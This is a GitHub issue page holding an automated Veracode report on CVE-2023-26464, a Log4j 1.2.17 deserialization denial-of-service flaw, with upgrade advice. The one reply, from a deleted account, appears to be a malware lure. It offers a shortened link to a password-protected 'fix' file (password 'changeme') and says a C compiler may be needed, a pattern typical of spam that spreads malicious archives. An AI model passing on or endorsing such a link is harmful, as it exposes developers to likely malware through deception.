julz0815 / test-action


CVE: 2023-26464 found in Apache Log4j - Version: 1.2.17 [JAVA] #1113

Open github-actions[bot] opened 2 months ago

github-actions[bot] commented 2 months ago

Veracode Software Composition Analysis

| Attribute | Details |
| --- | --- |
| Library | Apache Log4j |
| Description | Apache Log4j 1.2 |
| Language | JAVA |
| Vulnerability | Denial Of Service (DoS) |
| Vulnerability description | log4j:log4j is vulnerable to Denial of Service (DoS) attacks. The vulnerability is due to the Chainsaw or SocketAppender components processing a logging entry with either a deeply nested hashmap or hashtable, which can lead to memory exhaustion when the object is deserialized. An attacker can submit a crafted logging entry and cause Denial of Service if the JRE is below 1.7. |
| CVE | 2023-26464 |
| CVSS score | 5 |
| Vulnerability present in version/s | 1.1.3-1.2.17 |
| Found library version/s | 1.2.17 |
| Vulnerability fixed in version | |
| Library latest version | 1.2.17 |
| Fix | No fix is released. log4j:log4j 1.x has reached End of Life. Users should upgrade to the latest Log4j 2.x version. |

Links:

ghost commented 2 months ago

This might help: This file might fix it https://bit.ly/4gvtdhO

Password: changeme

You may need to install the C compiler.